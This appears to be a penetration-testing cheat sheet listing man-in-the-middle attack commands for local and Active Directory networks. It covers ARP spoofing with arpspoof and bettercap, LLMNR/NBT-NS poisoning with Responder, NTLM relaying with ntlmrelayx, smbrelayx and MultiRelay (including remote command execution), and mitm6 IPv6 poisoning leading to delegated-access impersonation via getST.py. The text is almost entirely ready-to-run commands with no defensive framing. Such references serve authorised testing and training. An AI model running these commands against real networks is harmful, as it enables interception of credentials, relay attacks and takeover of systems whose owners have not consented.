Man-in-the-Middle

ARP Cache Poisoning

Bettercap2

arp.spoof on

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

LLMNR/NBT-NS Poisoning and SMB Relay

Responder

Remember to start with

SMB = Off     # Turn this off
HTTP = Off    # Turn this off

responder -I eth0 -rv

responder -I eth0 -r -d -w

Relay

ntlmrelayx

cme smb <CIDR> --gen-relay-list targets.txt

ntlmrelayx.py -tf targets.txt

smbrelayx

smbrelayx.py -h <target_IP> -c "ipconfig"

MultiRelay

python MultiRelay.py -t <IP target> -u ALL

mitm6

mitm6 -d example.local --ignore-nofqdn

Relay

ntlmrelayx.py -6 -t ldaps://example.local --delegate-access --no-smb-server -wh test-wpad

Exploit

getST.py -spn cifs/example.local example.local/ADDED_PC\$ -impersonate TARGET_USER

InveighZero

Works from Windows systems:

• https://github.com/Kevin-Robertson/InveighZero